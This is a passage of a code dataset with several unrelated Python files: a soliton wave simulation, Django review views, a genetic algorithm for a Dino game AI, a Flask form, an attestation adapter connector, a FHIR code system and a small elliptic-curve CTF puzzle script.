False\n\nshockwave = False\n\ndiff = False\n\nplotdiff = False\n\nnotdiff = True\n\n#periodic boundary conditions imposed by shifting the list ---------------------------------------\n\ndef shift(List, positions):\n\n return List[positions:] + List[:positions]\n\n#function for the derivative\n\ndef f(u,dx):\n \n \n #this is the du/dt\n \n if shockwave == True or notdiff == True:\n \n #shockwave term with no non-linear term\n\n return -0.25*(1/dx)*((np.array(shift(u,1)))**2-((np.array(shift(u,-1)))**2))\n\n elif diff == True:\n\n D = 2.0\n \n return -0.25*(1/dx)*((np.array(shift(u,1)))**2-((np.array(shift(u,-1)))**2)) + D*(1/(dx**2))*(np.array(shift(u,1)) - 2*np.array(u) + np.array(shift(u,-1)))\n\n else:\n\n #discretisation for KdeV\n \n return -0.25*(1/dx)*((np.array(shift(u,1)))**2-((np.array(shift(u,-1)))**2)) - 0.5*(1/(dx)**3)*(np.array(shift(u,2)) - 2*np.array(shift(u,1)) + 2*np.array((shift(u,-1))) - np.array((shift(u,-2))))\n\n# functions for evaluating Runge-Kutta\n\ndef k1(a,dt,dx):\n \n return dt*f(list(a),dx)\n\ndef k2(a,dt,dx):\n \n return dt*f(list(np.array(a) + 0.5*k1(a,dt,dx)),dx)\n\ndef k3(a,dt,dx):\n \n return dt*f(list(np.array(a) + 0.5*k2(a,dt,dx)),dx)\n\ndef k4(a,dt,dx):\n \n return dt*f(list(np.array(a) + k3(a,dt,dx)),dx)\n\n# this simply plots sin wave with only positive values--------------------------------------------------------------------------\n\ndef s():\n\n a = np.arange(0,80,0.1)\n\n #sine wave plotted with amplitude much less than period\n \n b = 5*np.sin((a)/20)\n\n c = list((b > 0) * b)\n\n #this simply fills list with zeros to match x axis plot in animation\n\n d = list(np.zeros(100)) + c + list(np.zeros(100))\n\n return d\n\ndef u(x,t,alpha):\n\n #standard initial wave form centered at x = 20 \n \n return 12*(alpha**2)*(1/math.cosh(alpha*(x - 20 - 4*(alpha**2)*t)))**2\n\n#initial condition calculated with the analytic solution\n\nuvalues1 = np.array([u(i,0,alpha) for i in x])\n\n#save the initial condition to be used to reset the check for stability\n\nuo = uvalues1\n \nif wavebreak == False:\n \n uvalues = uvalues1\n \nt = []\n\ntt = 0\n\nn = 100\n\ndxl = np.logspace(-10, 0.2, n)\n\ndtl = np.logspace(-10, 0.2, n)\n\ndef sta(dx,dt,uvalues):\n \n global uo\n \n if max(uvalues) < 0.99*max(uo) or max(uvalues) > 1.01*max(uo) or np.isnan(max(uvalues)):\n \n return 0\n \n else:\n \n return 1\n\ndef round_sig(x, sig=2):\n\n if x == 0:\n \n return 0\n \n else:\n \n return round(x, sig-int(floor(log10(abs(x))))-1)\n\nif stabilityplot == True:\n \n steps = 0\n \n smap = []\n \n stability = []\n \n counter = 0\n \n for k in dxl:\n \n for l in dtl:\n \n counter += 1\n \n print(counter)\n \n while steps <= 100:\n \n c = uvalues #list\n \n u = np.array(c) + (1/6)*(k1(c,l,k) + 2*(k2(c,l,k) + k3(c,l,k)) + k4(c,l,k)) #array\n \n # Store the new solution\n \n uvalues = list(u)\n\n outcome = sta(k,l, uvalues)\n\n if outcome == 0:\n\n #exit loop\n\n steps = 101\n \n steps += 1\n\n #reset intial conditions\n\n uvalues = uo\n\n stability.append(outcome)\n \n steps = 0\n \n smap.append(stability)\n\n stability = []\n\n #plot heat map\n\n fig1, ax1 = plt.subplots()\n\n locs, labels = plt.xticks()\n\n locs, labels = plt.yticks()\n\n plt.xticks([round_sig(x) for x in np.linspace(0,n,n/10)], [round_sig(x) for x in np.logspace(-10, 0.2, n/10)])\n\n plt.yticks([round_sig(x) for x in np.linspace(0,n,n/10)], [round_sig(x) for x in np.logspace(-10, 0.2, n/10)])\n\n aa = ax1.imshow(smap, origin='lower', cmap='rainbow')\n \n cbar = fig1.colorbar(aa, ax=ax1, extend='both')\n \n ax1.set_title(\"Stability for alpha = \" + str(alpha))\n \n ax1.set_xlabel(\"dt\")\n \n ax1.set_ylabel(\"dx\")\n \n plt.show()\n\n# Function needed to initiate the animation --------------------------------------------------------------------------\n\ndef init():\n \n line.set_ydata(uvalues)\n \n return line,\n\n# Calculation for animation --------------------------------------------------------------------------\n\ndef update(i):\n \n global unext, uvalues, dx, dt\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n \n # Update the plot\n \n line.set_ydata(list(unext)) # update the data\n \n text.set_text(r't = {:3}'.format(i*dt))\n \n plt.text(list(uvalues).index(max(uvalues)), max(uvalues), r't = {}'.format(0.0))\n \n # Store the new solution\n \n uvalues = list(unext)\n \n return line, text\n\n#running the animation ----------------------------------------------------------------------------\n\nif animate == True:\n \n # Preparing the plots\n \n fig, ax = plt.subplots()\n \n line_ini = ax.plot(x, uvalues, 'r')\n \n line, = ax.plot(x, uvalues)\n \n plt.title(\"Soliton propagation\")\n \n plt.text(max(x) - 20, max(uvalues), r'alpha = {:3.2}'.format(alpha))\n \n text = plt.text(10, max(uvalues), r't = {}'.format(0.0))\n \n plt.xlabel('x (m)')\n \n plt.ylabel('u')\n \n # Start the animation (and therefore the calculation)\n \n ani = animation.FuncAnimation(fig, update, frames=np.arange(0,100000000,1), init_func=init, blit=False, interval=1)\n\n plt.show()\n\n#for velocity calc -------------------------------------------------------------------------------\n\ndef velocityplot():\n\n global dt, dx, x\n\n v = []\n\n h = []\n\n #list of alphas for velocity plot\n\n alpha = np.linspace(0.1,3.0,12)\n\n #set time want to run each soliton for\n\n t = 0.06\n\n #counter for time in propagation\n\n j = 1\n\n for l in alpha:\n\n uvalues = np.array([u(i,0,l) for i in x])\n\n #initial value of peak\n\n xo = list(uvalues).index(max(uvalues))\n\n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n j += 1\n\n #now append velocity and alpha (height 12alpa^2)\n\n v.append(dx*(list(uvalues).index(max(uvalues)) - xo)/(j*dt))\n\n j = 1\n\n h.append(12*(l**(2)))\n\n x2 = np.array(h)\n\n y2 = np.array(v)\n\n A = np.vstack([x2, np.ones(len(x2))]).T\n \n m, c = np.linalg.lstsq(A, y2, rcond=None)[0]\n\n # Polynomial Regression\n \n def polyfit(x, y, degree):\n \n results = {}\n\n coeffs = np.polyfit(x, y, degree)\n\n # Polynomial Coefficients\n \n results['polynomial'] = coeffs.tolist()\n\n # r-squared\n \n p = np.poly1d(coeffs)\n \n # fit values, and mean\n \n yhat = p(x) \n \n ybar = np.sum(y)/len(y)\n \n ssreg = np.sum((yhat-ybar)**2)\n \n sstot = np.sum((y - ybar)**2)\n \n results['determination'] = ssreg / sstot\n\n return results\n\n r_value = polyfit(x2,y2,1)['determination']\n\n plt.figure()\n \n plt.scatter(x2,y2, s =6)\n \n plt.plot(x2, m*x2 + c, 'r', label='Fitted line,' + '\\n' + 'm = ' + str(m) + '\\n' + 'r = ' +str(r_value) + '\\n' + 'intercept = ' + str(c))\n\n plt.legend()\n\n plt.grid(True)\n\n plt.title(\" Velocity vs Height \")\n\n plt.xlabel(\"Height (m)\")\n\n plt.ylabel(\"Velocity (m/s)\")\n\n plt.xlim(0, max(x2))\n\n plt.ylim(0,max(y2))\n\n plt.show()\n\nif velplot == True:\n \n velocityplot()\n\n#plotting soliton propagation --------------------------------------------------------------------------\n\ndef plotsol(alpha,t,f):\n\n global x, dt, dx\n\n j = 0\n\n uvalues = np.array([u(i,0,alpha) for i in x])\n\n plt.figure()\n\n plt.plot(x,uvalues)\n\n plt.title(\"Soliton propagation with alpha = \" + str(alpha))\n \n plt.xlabel(\"x (m)\")\n \n plt.ylabel(\"u\")\n\n plt.text(list(uvalues).index(max(uvalues))*dx , max(uvalues), r't = {:3.2}'.format(j*dt))\n\n i = 1\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n tt = j*dt\n\n if tt > i*f:\n \n plt.plot(x,unext)\n \n plt.text(list(unext).index(max(unext))*dx , max(unext), r't = {:3.2}'.format(j*dt))\n \n i += 1\n\n j += 1\n\n plt.show()\n\n#alpha = 2, run with (2.0,2.1,0.5)\n\n#alpha = 3, run with (3.0,1,0.3)\n\nif plotsoliton == True:\n \n plotsol(3.0,1,0.3)\n\n#heat map ----------------------------------------------------------------------------------------\n\ndef umap(alpha,t,x):\n \n global dt, dx\n\n j = 0\n\n umap = []\n\n tg = []\n\n uvalues = np.array([u(i,0,alpha) for i in x])\n\n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n umap.append(uvalues)\n\n tg.append(j*dt)\n\n j += 1\n\n fig1, ax1 = plt.subplots()\n \n aa = ax1.imshow(umap, extent = [0,len(x)*dx,0,len(tg)*dt], origin='lower', cmap='rainbow')\n \n cbar = fig1.colorbar(aa, ax=ax1, extend='both')\n\n if plotdiff == True:\n\n ax1.set_title(\"Soliton diffusion shockwave\")\n\n elif notdiff == True:\n\n ax1.set_title(\"Soliton shockwave\")\n\n else:\n\n ax1.set_title(\"Soliton colour map with alpa = \" +str(alpha))\n \n ax1.set_xlabel(\"x (m)\")\n \n ax1.set_ylabel(\"t (s)\")\n \n plt.show()\n\nif plotcmap == True:\n \n umap(1.0,30,np.arange(0,30,dx))\n\n#heat map for collisions--------------------------------------------------------------------------\n\ndef umapcol(alpha, alpha2, t):\n \n global dt, dx\n\n x = np.arange(0,30,dx)\n\n j = 0\n\n umap = []\n\n tg = []\n\n uvalues1 = np.array([u(i,0,alpha) for i in x])\n\n #add another soliton\n \n uvalues2 = np.array([u(i-5,0,alpha2) for i in x])\n\n uvalues = list(uvalues1 + uvalues2)\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n umap.append(uvalues)\n\n tg.append(j*dt)\n\n j += 1\n\n fig1, ax1 = plt.subplots()\n \n aa = ax1.imshow(umap, extent = [0,len(x)*dx,0,len(tg)*dt], origin='lower', cmap='rainbow')\n \n cbar = fig1.colorbar(aa, ax=ax1, extend='both')\n \n ax1.set_title(\"Soliton colour map with alpa = \" +str(alpha) + \", \" + str(alpha2))\n \n ax1.set_xlabel(\"x (m)\")\n \n ax1.set_ylabel(\"t (s)\")\n \n plt.show()\n\nif plotcmapcol == True:\n \n umapcol(1.0,1.2,30)\n \n#wavebreaking will be checked with sine wave ------------------------------------------------------\n\ndef wavebreakplot(t,f):\n \n global x, dt, dx\n\n j = 0\n\n ppos = [50,90]\n\n uvalues = s()\n\n x = np.arange(0,100,0.1)\n\n plt.figure()\n\n plt.plot(x,uvalues)\n\n plt.title(\"Wave breaking with a sine wave\")\n \n plt.xlabel(\"x (m)\")\n \n plt.ylabel(\"u\")\n\n plt.text(list(uvalues).index(max(uvalues))*dx - 200*dx, max(uvalues), r't = {:3.2}'.format(j*dt))\n\n i = 1\n\n k = 0\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n tt = j*dt\n\n if tt > i*f:\n \n plt.plot(x,unext)\n \n plt.text(ppos[k], max(unext), r't = {:3.2}'.format(j*dt))\n\n k += 1\n \n i += 8\n\n j += 1\n\n plt.show()\n\nif wavebreak == True:\n \n wavebreakplot(20,2)\n\n#heat map ----------------------------------------------------------------------------------------\n\ndef umapwb(t):\n \n global dt, dx\n\n x = np.arange(0,100,dx)\n\n j = 0\n\n umap = []\n\n tg = []\n\n uvalues = s()\n\n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n umap.append(uvalues)\n\n tg.append(j*dt)\n\n j += 1\n\n fig1, ax1 = plt.subplots()\n \n aa = ax1.imshow(umap, extent = [0,len(x)*dx,0,len(tg)*dt], origin='lower', cmap='rainbow')\n \n cbar = fig1.colorbar(aa, ax=ax1, extend='both')\n \n ax1.set_title(\"Wave breaking colour map\")\n \n ax1.set_xlabel(\"x (m)\")\n \n ax1.set_ylabel(\"t (s)\")\n \n plt.show()\n\nif plotcmapwb == True:\n\n umapwb(60)\n\n#shock wave with soliton ------------------------------------------------------------------------\n\ndef shockwaveplot(t,f):\n \n global x, dt, dx\n\n j = 0\n\n x = np.arange(0, 100, dx)\n\n uvalues = np.array([u(i,0,1.0) for i in x])\n\n plt.figure()\n\n plt.plot(x,uvalues)\n\n plt.title(\"Shock wave with a soliton\")\n \n plt.xlabel(\"x (m)\")\n \n plt.ylabel(\"u\")\n\n i = 1\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n tt = j*dt\n\n if tt > i*f:\n \n plt.plot(x,unext)\n \n i += 19\n\n j += 1\n\n plt.show()\n\nif shockwave == True:\n \n shockwaveplot(50,2)\n\n\n#make this shock wave with diffusion ------------------------------------------------------------------------\n\n#animate the diffusive term\n\ndef shockwaveplotdiff(t,f):\n \n global x, dt, dx\n\n j = 0\n\n x = np.arange(0, 100, dx)\n\n uvalues = np.array([u(i,0,1.0) for i in x])\n\n plt.figure()\n\n plt.plot(x,uvalues)\n\n plt.title(\"Shock wave with a soliton\")\n \n plt.xlabel(\"x (m)\")\n \n plt.ylabel(\"u\")\n\n i = 1\n \n while j*dt <= t:\n\n c = uvalues #list\n\n unext = np.array(c) + (1/6)*(k1(c,dt,dx) + 2*(k2(c,dt,dx) + k3(c,dt,dx)) + k4(c,dt,dx)) #array\n\n uvalues = list(unext)\n\n tt = j*dt\n\n if tt > i*f:\n \n plt.plot(x,unext)\n \n i += 40\n\n j += 1\n\n plt.show()\n\nif diff == True and plotdiff == False:\n \n shockwaveplotdiff(40,0.2)\n\nif diff == True and plotdiff == True:\n\n umap(1.0,60,np.arange(0,60,dx))\n\nif notdiff == True:\n\n umap(1.0,40,np.arange(0,60,dx))\n\n \n\n \n \n\n\n\n \n\n \n\n\n \n\n \n","repo_name":"mhal1/Solitons","sub_path":"Soliton.py","file_name":"Soliton.py","file_ext":"py","file_size_in_byte":15438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"30223980132","text":"from django.db.models import Avg\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom checkout.models import Order, OrderLineItem\nfrom review.models import ReviewRating\nfrom products.models import Product, Category\n\nfrom review.forms import ReviewForm\n\n\n@login_required\ndef order_view(request):\n \"\"\"Show all orders for the requested user\"\"\"\n\n orders = Order.objects.filter(user_profile__user=request.user).order_by('-id')\n return render(request, \"review/order_list.html\", {\"orders\": orders, 'categories': Category.objects.all()})\n\n@login_required\ndef order_details(request, order_number):\n \"\"\"A view to show the details of a specific order\"\"\"\n\n order_item = OrderLineItem.objects.filter(order__order_number=order_number, order__user_profile__user=request.user)\n return render(request, \"review/order_details.html\", {\"order_item\": order_item, 'categories': Category.objects.all()})\n\n@login_required\ndef submit_review(request):\n \"\"\"A view to submit a review\"\"\"\n\n url = request.META.get('HTTP_REFERER')\n if request.method == 'POST':\n form = ReviewForm(request.POST)\n if form.is_valid():\n data = ReviewRating(\n order_item= form.cleaned_data['order_item'], \n rating= form.cleaned_data['rating'], \n review= form.cleaned_data['review']\n )\n data.save()\n\n # calculate review of the product\n # and save into product model\n avg_rating = ReviewRating.objects.filter(order_item__product=data.order_item.product).annotate(ave_price=Avg('rating'))\n Product.objects.filter(pk=data.order_item.product.id).update(rating=avg_rating[0].rating)\n\n messages.success(request, 'Thank you! Your review has been submitted.')\n return redirect(url)","repo_name":"Iacopo454/Shoes-shop","sub_path":"review/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24132760357","text":"import numpy as np\r\nfrom Dino import *\r\n\r\n# Step 1: Create initial population\r\ndef create_new_population(population_size):\r\n active_dinos = []\r\n all_dinos = []\r\n\r\n for i in range(population_size):\r\n dino = Dino()\r\n active_dinos.append(dino) # important that both lists contain the same dinos\r\n all_dinos.append(dino)\r\n\r\n return all_dinos, active_dinos\r\n\r\n# Step 2: Selection\r\ndef calculate_fitness(all_dinos):\r\n # get all dino scores and calculate for each dino\r\n # a normalized fitness score\r\n\r\n for dino in all_dinos:\r\n dino.score = dino.score**2\r\n\r\n sum = 0\r\n for dino in all_dinos:\r\n sum += dino.score\r\n\r\n for dino in all_dinos:\r\n dino.fitness = dino.score / sum\r\n\r\n return all_dinos\r\n\r\ndef create_mating_pool(all_dinos):\r\n # create a mating pool based on the dinos fitness\r\n # The higher the dino is in fitness, the more often it will be\r\n # represented in the mating pool. Therefore it will be selected\r\n # more often for reproduction (Step 3)\r\n\r\n # The creation of the this mating_pool leads to an exponential split in\r\n # fitness. The fittest dinos are exponentially represented. Therefore in the\r\n # long run, when only few Dinos make it far, only these will be able to\r\n # reproduce.\r\n\r\n mating_pool = []\r\n for dino in all_dinos:\r\n f = int(dino.fitness * len(all_dinos) * 10)\r\n for i in range(f):\r\n mating_pool.append(dino)\r\n\r\n # Sort mating pool by dino's fitness. Fittest dino becomes first element\r\n mating_pool = sorted(mating_pool, key = lambda dino: dino.fitness)[::-1]\r\n\r\n # natural selection: only the top 10% \"survive\" and are allowed to breed\r\n mating_pool = mating_pool[0:(len(mating_pool) // 10)]\r\n\r\n return mating_pool\r\n\r\n# Step 3: Reproduction\r\ndef create_next_generation(population_size, dino_mating_pool):\r\n\r\n all_dinos = []\r\n active_dinos = []\r\n\r\n def crossover(father_DNA, mother_DNA): # Crossover\r\n # Due to the design of the create_mating_pool-function crossover becomes\r\n # more and more insignificant. At the end only clones of the same dinos\r\n # mate.\r\n\r\n crossover_DNA = {}\r\n\r\n heritage_percentage = np.random.randint(11)*0.1\r\n\r\n for index in father_DNA.keys():\r\n # create a Deep copy of the father's DNA, so that the crossover_DNA\r\n # has the same shape as the former Generation\r\n crossover_DNA[index] = np.copy(father_DNA[index])\r\n\r\n orig_shape = father_DNA[index].shape\r\n for i in range(orig_shape[0]):\r\n for j in range(orig_shape[1]):\r\n if np.random.random() < heritage_percentage:\r\n crossover_DNA[index][i,j] = mother_DNA[index][i,j]\r\n\r\n return crossover_DNA\r\n\r\n def mutate(DNA):# Mutate\r\n\r\n def mutate_genome(S):\r\n orig_shape = S.shape\r\n for i in range(orig_shape[0]):\r\n for j in range(orig_shape[1]):\r\n if np.random.random() < mutation_rate:\r\n S[i,j] = np.random.randn() * mutation_magnitude\r\n\r\n return S.reshape(orig_shape)\r\n\r\n mutation_rate = 0.05\r\n # A higher mutation_rate leads to longer\r\n # stagnation at the beginning, but leads to faster game progressing in the long\r\n # run (fewer Dinos survive up until the higher tiers). A lower mutation_rate\r\n # leads to faster initial progress, but to slower longterm progress.\r\n # Any mutation_rate higher then 0.09 leads to longterm stagnation.\r\n\r\n mutation_magnitude = 0.1\r\n\r\n mutated_DNA = {}\r\n\r\n for i in DNA.keys(): # Mutate the DNA\r\n mutated_DNA[i] = mutate_genome(np.copy(DNA[i]))\r\n\r\n return mutated_DNA\r\n\r\n for i in range(population_size):\r\n\r\n # select random mating partners\r\n a = np.random.randint(0, len(dino_mating_pool))\r\n b = np.random.randint(0, len(dino_mating_pool))\r\n\r\n # Crossover and Mutation\r\n father_DNA = {}\r\n mother_DNA = {}\r\n\r\n for i in dino_mating_pool[0].brain.neural_wiring.keys():\r\n # The father's and the mother's DNA (neural wiring) are copied from the selected\r\n # Dinos from the dino_mating_pool.\r\n father_DNA[i] = np.copy(dino_mating_pool[a].brain.neural_wiring[i])\r\n mother_DNA[i] = np.copy(dino_mating_pool[b].brain.neural_wiring[i])\r\n\r\n crossover_DNA = crossover(father_DNA, mother_DNA)\r\n child_DNA = mutate(crossover_DNA)\r\n\r\n # create a new child\r\n child = Dino()\r\n\r\n # inherit crossover-mutated DNA\r\n for i in child.brain.neural_wiring.keys():\r\n child.brain.neural_wiring[i] = child_DNA[i]\r\n\r\n all_dinos.append(child)\r\n active_dinos.append(child)\r\n\r\n return all_dinos, active_dinos\r\n","repo_name":"MaxLell/Chrome_Dino_AI","sub_path":"library/Genetic_Algorithm.py","file_name":"Genetic_Algorithm.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"42"} +{"seq_id":"28994868020","text":"from datetime import date\nfrom flask_wtf import Form\nfrom wtforms import TextField, RadioField\nfrom wtforms.validators import Length, ValidationError\nfrom claimants_user_journey.forms.custom_field_types import CustomDateField\nfrom claimants_user_journey.forms.validators import CustomDateFieldValidator\n\n\nclass EmploymentDetails(Form):\n job_title = TextField('Job Title', validators=[Length(max=30)])\n _worker_type_options = [\n 'Employed',\n 'Labour-only Sub-contractor',\n 'Agency Worker',\n 'Fixed-term contracts worker',\n 'Director or Shareholder',\n 'Freelance worker',\n 'Casual worker',\n 'Home worker'\n ]\n type_of_worker = RadioField(\n 'What type of worker were you?',\n choices = [\n ('employed', 'Employed
You were employed under a contract of employment'),\n ('labour-only sub-contractor', 'Labour-only Sub-contractor
You were self employed and paid tax and national insurance on that basis'),\n ('agency worker', 'Agency Worker
You were working for the client of an agency'),\n ('fixed term contract', 'Fixed Term Contract
Your contract was for a specific period of time i.e. it had an end date'),\n ('director or shareholder', 'Director or Shareholder
You were an office holder of the company'),\n ('freelance', 'Freelance
You worked for yourself and the business was a client'),\n ('casual worker', 'Casual Worker
You worked for the employer as and when required'),\n ('home worker', 'Home Worker
You worked from home but attended an office for meetings')\n ],\n )\n start_date = CustomDateField(label=\"When did you start working for this employer?\", validators=[CustomDateFieldValidator()])\n end_date = CustomDateField(label=\"When did your employment end?\", validators=[CustomDateFieldValidator(start_date_field_name='start_date')])\n","repo_name":"InsolvencyService/rps-alpha","sub_path":"rps/claimants_user_journey/forms/employment_details.py","file_name":"employment_details.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"11654245823","text":"import configparser\nimport importlib\nimport sys\n\nconfig = configparser.ConfigParser()\nconfig.read('config/config.ini')\n\nclasses = {}\n\n# Import all adapters (the name of the att_tech attribute of an entity must match the name of one of the adapters' scripts)\n# Adapters must be specified in the config/config.ini file:\n# [adapters]\n# file_name = class_name\ndef refresh_adapters():\n for module in config[\"adapters\"].keys():\n class_ = config[\"adapters\"][module]\n try:\n classes[module] = getattr(importlib.import_module(\".\"+module, \"adapters\"), class_) #__import__(\"adapters.\"+module, fromlist=[module]), class_\n except:\n print(\"Adapter \" + module + \" NOT found!\", file=sys.stderr)\n\n\ndef register_entity(entity, whitelist, verifier):\n\n refresh_adapters()\n \n if verifier[\"att_tech\"] in classes.keys():\n if hasattr(classes[verifier[\"att_tech\"]], 'register') and callable(getattr(classes[verifier[\"att_tech\"]], 'register')):\n classes[verifier[\"att_tech\"]].register(entity, whitelist, verifier)\n else:\n return {\"error\" : \"no register() method found for \" + verifier[\"att_tech\"] + \" adapter\"} \n else:\n return {\"error\" : \"no adapter found for attestation technology \" + verifier[\"att_tech\"] }\n\ndef verify_entity(entity, verifier, whitelist, se, topic):\n\n refresh_adapters()\n\n if verifier[\"att_tech\"] in classes.keys():\n if hasattr(classes[verifier[\"att_tech\"]], 'register') and callable(getattr(classes[verifier[\"att_tech\"]], 'register')):\n classes[verifier[\"att_tech\"]].attest(entity, verifier, whitelist, se, topic)\n else:\n return {\"error\" : \"no attest() method found for \" + verifier[\"att_tech\"] + \" adapter\"} \n else:\n return {\"error\" : \"no adapter found for attestation technology \" + verifier[\"att_tech\"] }\n\ndef delete_entity(entity, verifier):\n\n refresh_adapters()\n\n if entity[\"att_tech\"] in classes.keys():\n if hasattr(classes[entity[\"att_tech\"]], 'delete') and callable(getattr(classes[entity[\"att_tech\"]], 'delete')):\n classes[entity[\"att_tech\"]].delete(entity, verifier)\n else:\n return {\"error\" : \"no delete() method found for \" + entity[\"att_tech\"] + \" adapter\"} \n else:\n return {\"error\" : \"no adapter found for attestation technology \" + entity[\"att_tech\"] }\n\ndef status(verifier):\n\n refresh_adapters()\n\n if verifier[\"att_tech\"] in classes.keys():\n if hasattr(classes[verifier[\"att_tech\"]], 'status') and callable(getattr(classes[verifier[\"att_tech\"]], 'status')):\n classes[verifier[\"att_tech\"]].status(verifier)\n else:\n return {\"error\" : \"no status() method found for \" + verifier[\"att_tech\"] + \" adapter\"} \n else:\n return {\"error\" : \"no adapter found for attestation technology \" + verifier[\"att_tech\"] }","repo_name":"H2020-FISHY/trust-monitor","sub_path":"adapters_connector.py","file_name":"adapters_connector.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"23167270941","text":"from pathlib import Path\n\nfrom fhir.resources.codesystem import CodeSystem\n\nfrom oops_fhir.utils import CodeSystemConcept\n\n\n__all__ = [\"LibraryType\"]\n\n_resource = CodeSystem.parse_file(Path(__file__).with_suffix(\".json\"))\n\n\nclass LibraryType:\n \"\"\"\n LibraryType\n\n The type of knowledge asset this library contains.\n\n Status: draft - Version: 4.0.1\n\n Copyright None\n\n http://terminology.hl7.org/CodeSystem/library-type\n \"\"\"\n\n logic_library = CodeSystemConcept(\n {\n \"code\": \"logic-library\",\n \"definition\": \"The resource is a shareable library of formalized knowledge.\",\n \"display\": \"Logic Library\",\n }\n )\n \"\"\"\n Logic Library\n\n The resource is a shareable library of formalized knowledge.\n \"\"\"\n\n model_definition = CodeSystemConcept(\n {\n \"code\": \"model-definition\",\n \"definition\": \"The resource is a definition of an information model.\",\n \"display\": \"Model Definition\",\n }\n )\n \"\"\"\n Model Definition\n\n The resource is a definition of an information model.\n \"\"\"\n\n asset_collection = CodeSystemConcept(\n {\n \"code\": \"asset-collection\",\n \"definition\": \"The resource is a collection of knowledge assets.\",\n \"display\": \"Asset Collection\",\n }\n )\n \"\"\"\n Asset Collection\n\n The resource is a collection of knowledge assets.\n \"\"\"\n\n module_definition = CodeSystemConcept(\n {\n \"code\": \"module-definition\",\n \"definition\": \"The resource defines the dependencies, parameters, and data requirements for a particular module or evaluation context.\",\n \"display\": \"Module Definition\",\n }\n )\n \"\"\"\n Module Definition\n\n The resource defines the dependencies, parameters, and data requirements for a particular module or evaluation context.\n \"\"\"\n\n class Meta:\n resource = _resource\n","repo_name":"Mikuana/oops_fhir","sub_path":"oops_fhir/r4/code_system/library_type.py","file_name":"library_type.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"29490497830","text":"from fastecdsa.curve import Curve\nfrom fastecdsa.point import Point\nfrom Crypto.Util.number import getPrime\nfrom Crypto.Random.random import randrange\n\nBITS = 80\n\nwhile True:\n\tp = getPrime(BITS)\n\tif p % 4 == 3:\n\t\tbreak\n\na, b = randrange(1, p), randrange(1, p)\nC = Curve(\"FCSC\", p, a, b, 0, 0, 0)\n\nwhile True:\n\txP = randrange(1, p)\n\tyP = (xP ** 3 + a * xP + b) % p\n\tif pow(yP, (p - 1) // 2, p) == 1:\n\t\tbreak\n\nyP = pow(yP, (p + 1) // 4, p)\nassert (xP ** 3 + a * xP + b - yP ** 2) % p == 0\n\nP = Point(xP, yP, C)\nQ = 2 * P\n\nprint(\"Can you find my secret curve equation: y^2 = x^3 + a*x + b (mod p)?\")\nprint(\"I will give you two points:\")\nprint(f\"P = ({P.x}, {P.y})\")\nprint(f\"Q = ({Q.x}, {Q.y})\")\n\ntry:\n\ta = int(input(\">>> a = \"))\n\tb = int(input(\">>> b = \"))\n\tp = int(input(\">>> p = \"))\n\n\tC = Curve(\"Check\", p, a, b, 0, 0, 0)\n\tcheck = True\n\tcheck &= p.bit_length() >= BITS\n\tcheck &= (P.x ** 3 + a * P.x + b - P.y ** 2) % p == 0\n\tcheck &= (Q.x ** 3 + a * Q.x + b - Q.y ** 2) % p == 0\n\tcheck &= (2 * Point(P.x, P.y, C) == Point(Q.x, Q.y, C))\n\tif check:\n\t\tprint(\"Congratulations!! Here is your flag:\")\n\t\tprint(open(\"flag.txt\", \"r\").read())\n\telse:\n\t\tprint(\"That's not it!\")\nexcept:\n\tprint(\"That's not it!\")\n","repo_name":"Antoine-Gicquel/FCSC2021-writeups","sub_path":"Crypto/Lost Curve/lost_curve.py","file_name":"lost_curve.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"26945943564","text":"from PyQt4 import QtGui, QtCore\r\nimport sys\r\nimport main_design\r\nimport json_creator_design\r\nimport new_line_design\r\nimport requests\r\nimport re\r\nimport os\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport shutil\r\nimport json\r\nimport time\r\nfrom jason_creator import 